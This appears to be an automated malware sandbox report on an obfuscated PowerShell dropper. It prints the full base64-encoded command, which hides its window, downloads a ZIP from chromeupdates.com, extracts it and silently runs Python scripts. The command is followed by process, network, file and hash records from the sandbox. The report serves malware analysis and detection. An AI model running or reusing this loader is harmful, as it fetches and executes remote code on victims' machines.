powershell -ep by"pas"s -w hid"de"n -enc JAB1AHIAbAAgAD0AIAAnAGgAd"AB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0A"GgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcABvAHMAZQBpAGQAbwBuADEAMwAzADgALwBzAHAAMAA0AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBzAGIAYQB0ADIAJwANAAoAJAB1AHIAbAAyACAAPQAgACcAJwANAAoAZgB1AG4AYwB0AGkAbwBuACAASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACAAewANAAoAIAAgACQAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAQwBvAGQAZQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAnAA0ACgAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjAEMAbwBkAGUAIAAtAG4AYQBtAGUAIABXAGkAbgAzADIAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBQAGEAcwBzAFQAaAByAHUADQAKAA0ACgAgACAAJABoAHcAbgBkACAAPQAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBQAEkARAAgACQAcABpAGQAKQAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIABpAGYAIAAoACQAaAB3AG4AZAAgAC0AbgBlACAAWwBTAHkAcwB0AGUAbQAuAEkAbgB0AFAAdAByAF0AOgA6AFoAZQByAG8AKQAgAHsADQAKACAAIAAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwA6ADoAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKAAkAGgAdwBuAGQALAAgADAAKQANAAoAIAAgAH0AIABlAGwAcwBlACAAewANAAoADQAKACAAIAAgACAAJABVAG4AaQBxAHUAZQBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAA9ACAATgBlAHcALQBHAHUAaQBkAA0ACgAgACAAIAAgACQASABvAHMAdAAuAFUASQAuAFIAYQB3AFUASQAuAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQAgAD0AIAAkAFUAbgBpAHEAdQBlAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQANAAoAIAAgACAAIAAkAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIAAxADAAMgA0AA0ACgAgACAAIAAgACQAVABlAHIAbQBpAG4AYQBsAFAAcgBvAGMAZQBzAHMAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAAtAGUAcQAgACQAVQBuAGkAcQB1AGUAVwBpAG4AZABvAHcAVABpAHQAbABlA"CAAfQApAA0ACgAgACAAIAANAAoAIAAgA"CAAIAAkAGgAdwBuAGQAIAA9ACAAJABUAGUAcgBtAGkAbgBhAGwAUAByAG8AYwBlAHMAcwAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIAAgACAAaQBmACAAKAAkAGgAdwBuAGQAIAAtAG4AZQAgAFsAUwB5AHMAdABlAG0ALgBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkAIAB7AA0ACgAgACAAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjADoAOgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAoACQAaAB3AG4AZAAsACAAMAApAA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARgBhAGkAbABlAGQAIAB0AG8AIABoAGkAZABlACAAdABoAGUAIABjAG8AbgBzAG8AbABlACAAdwBpAG4AZABvAHcALgAiAA0ACgAgACAAIAAgAH0ADQAKACAAIAB9AA0ACgB9AA0ACgBIAGkAZABlAC0AQwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwANAAoAJABlAG4AdgBwACAAPQAgACIAQwA6AFwAVwBpAG4ARQB4AHAAbABvAHIAZQByAFwAIgANAAoAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZQBuAHYAcAApACkAIAB7AA0ACgAgACAAIAAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAGUAbgB2AHAADQAKACAAIAAgACAAIwBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAQAbAB3R5uAGcAIABkAKsebgAgABEB4wAgABEBsAHjHmMAIAB0AKEebwA6ACAAJABlAG4AdgBwACIADQAKAH0ADQAKAGUAbABzAGUAIAB7AA0ACgAgACAAIAAgACMAVwByAGkAdABlAC0ASABvAHMAdAAgACIAEAGwAd0ebgBnACAAZACrHm4AIAARAeMAIAB0ANMebgAgAHQAoR5pADoAIAAkAGUAbgB2AHAAIgANAAoAfQANAAoAJABlAG4AdgB1ACAAPQAgACIAaAB0AHQAcABzADoALwAvAGMAaAByAG8AbQBlAHUAcABkAGEAdABlAHMALgBjAG8AbQAvAEUAbgB2AC4AegBpAHAAIgANAAoAJABlAG4AdgB6ACAAPQAgACQAZQBuAHYAcAAgACsAIAAiAFcAaQBuAEgAZQBsAHAAZQByAC4AegBpAHAAIgANAAoAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAGwAaQBlAG4AdAApAC4ARABvAFcAbgBsAG8AQQBkAEYAaQBsAGUAKAAkAGUAbgB2AHUALAAgACQAZQBuAHYAegApAA0ACgB0AHIAeQAgAHsADQAKACAAIAAgACAAIwAgAFQAox5pACAAdABoALABIAB2AGkAxx5uACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBGAGkAbABlAFMAeQBzAHQAZQBtACAAbgC/HnUAIABjAGgAsAFhACAAYwDzAA0ACgAgACAAIAAgAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARgBpAGwAZQBTAHkAcwB0AGUAbQAiAA0ACgANAAoAIAAgACAAIAAjACAAEAGwAd0ebgBnACAAZACrHm4AIAARAb8ebgAgAGYAaQBsAGUAIABaAEkAUAAgAHYA4AAgAHQAaACwASAAbQDlHmMAIAARAe0AYwBoAA0ACgAgACAAIAAgACQAegBpAHAARgBpAGwAZQBQAGEAdABoACAAPQAgACQAZQBuAHYAegANAAoAIAAgACAAIAAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBGAG8AbABkAGUAcgAgAD0AIAAkAGUAbgB2AHAADQAKAA0ACgAgACAAIAAgACMAIABHAGkAox5pACAAbgDpAG4AIABmAGkAbABlACAAWgBJAFAADQAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAFoAaQBwAEYAaQBsAGUAXQA6ADoARQB4AHQAcgBhAGMAdABUAG8ARABpAHIAZQBjAHQAbwByAHkAKAAkAHoAaQBwAEYAaQBsAGUAUABhAHQAaAAsACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4ARgBvAGwAZABlAHIAKQANAAoADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARwBpAKMeaQAgAG4A6QBuACAAdABoAOAAbgBoACAAYwD0AG4AZwAhACIAOwANAAoAfQAgAGMAYQB0AGMAaAAgAHsADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQwDzACAAbADXHmkAIAB4AKMeeQAgAHIAYQAgAHQAcgBvAG4AZwAgAHEAdQDhACAAdAByAOwAbgBoACAAZwBpAKMeaQAgAG4A6QBuADoAIgANAAoAfQANAAoAJABzAHQAIAA9ACAAJABlAG4AdgBwACAAKwAgACIARwBpAG0AcABvAHIAdAAuAGQAYQB0ACIADQAKACQAcwB0AGMAdAAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAHMAdAAgAC0AUgBhAHcAIAANAAoAJABzAHQAYwB0ADIAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABzAHQAIAAtAFIAYQB3AA0ACgANAAoAJABzAHQAYwB0ACAAPQAgACQAcwB0AGMAdAAgAC0AcgBlAHAAbABhAGMAZQAgACIAJQB1AHAAJQAiACwAIAAkAHUAcgBsACAADQAKACQAcwB0AGMAdAAyACAAPQAgACQAcwB0AGMAdAAyACAALQByAGUAcABsAGEAYwBlACAAIgAlAHUAcAAlACIALAAgACQAdQByAGwAMgANAAoAJAByAHQAYwAxACAAPQAgACQAZQBuAHYAcAAgACsAIAAiAHYAYwByAHUAbgB0AGkAbQBlADEANAAwAC4AcAB5ACIADQAKACQAcgB0AGMAMgAgAD0AIAAkAGUAbgB2AHAAIAArACAAIgB2AGMAcgB1AG4AdABpAG0AZQAxADQAMABkAC4AcAB5ACIADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAcgB0AGMAMQAgAC0AVgBhAGwAdQBlACAAJABzAHQAYwB0AA0ACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAHIAdABjADIAIAAtAFYAYQBsAHUAZQAgACQAcwB0AGMAdAAyAA0ACgAkAGUAIAA9ACAAJABlAG4AdgBwACAAKwAgACIAcAB5AHQAaABvAG4ALgBlAHgAZQAiACAA"DQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHM"AIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAGAAIgAkAHIAdABjADEAYAAiACIAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBgACIAJAByAHQAYwAyAGAAIgAiACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 chromeupdates.com udp
VN 202.92.4.57:443 chromeupdates.com tcp
VN 202.92.4.57:443 chromeupdates.com tcp

Files

memory/2576-4-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

memory/2576-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/2576-6-0x0000000002150000-0x0000000002158000-memory.dmp

memory/2576-7-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

memory/2576-10-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\77uqfd2w.0.cs

MD5 a6e80541a483188dbce2f3d843fcbe4d
SHA1 a1f2e13a3314ab6a676751936c7b3b9a9fb9103e
SHA256 d5b10c7f3cbb62cbf4772a7b178c578c8abaa3fe9a7420decbff18d81f08ccd9
SHA512 6f60f86688dc256a668b6e3e8529820cf8253c47c6a1126f3097576f36b5c220f32febabce65e25dfa5b824dc2200b7ca7aca2c3bc3b8314cadb734a589b6337

memory/1824-15-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline

MD5 7abe853e22ad6754fb8c310d701e426f
SHA1 fc936fa42b2bda340cec91cf3037d74be2fce6f2
SHA256 f5f3a6b2639b874b9421aa015abcc461e2731293875cdefde27fe6f9e9feaa14
SHA512 1e226ff9b3b767fca4711628e338171e43093be0a334e1e4b2f63ca9e8a1f2f62f0ffe225719acf0d3254eae39dccab95aa6a9bfdd91277523458a5a3cc4ecc1

memory/2576-12-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp

MD5 edc11b3922d216360ca544fb4877562e
SHA1 4fa1dbc2b1c8af96b2afeb67811de2474a3fd431
SHA256 7b7dde2aeba3e015615f8d492c41e2a13ade1fd75c13afa478cd298ff40c802b
SHA512 59431ff0c390cc731a53c46132600182e4365883ae28c7c6f9c6fed702ee95f94742a321f32307cea7c04c8cab525c9f45293666c1c9e10fd88461ae6df6563a

C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp

MD5 97cd5937f41ec0eac002770b4b081b9f
SHA1 a82bf85592e9c2c326e2c93076c4f0ded1d4f25c
SHA256 33cee92a699239271539105e70592133ee8393d50f5b04ff9598a9bd4539f56b
SHA512 a5b69c710fa8f1cf545c071b86843e92a9ddcdfb3523df0e5dc364e5ad472bbccd851e8045f37e4718fcb8f3646d09cdb14e9d73591fffaf8d711b7b28766f7a

memory/1824-23-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\77uqfd2w.pdb

MD5 bb0c6ea81fdbba60e594aa1bfa1164f5
SHA1 c06d029700e62b15c82fe6f4588856c9abcad119
SHA256 4f8d3318a69d82b50512e8e1c57f0ad721a3351590f95242665610774b7b2290
SHA512 f87e7b424c9303f21f77a0399568aba6730e32ea050f3df77c691e38dda91d6a6357aa51a0ebd971196b53c097f4fbc1bb0fe889a32aef9d5e2ae08645884238

memory/2576-25-0x00000000029F0000-0x00000000029F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\77uqfd2w.dll

MD5 eff24776c5ea4ca313b317a0a130e3f5
SHA1 6155d10acff863e48c6daf94abc717a01bd23f24
SHA256 8a882d47c662389785a26808ecf3290e8caca4d84bb199feb75a37a8eb94fd6d
SHA512 d526e3cb364a8847c908b3725a2d8ee8eb8f6230a9dac572d1b78596dff80bdf97f2fd94635e3621f94ef341b56e2573176dfc412847eb082dbfb81c62bb4e68

memory/2576-30-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp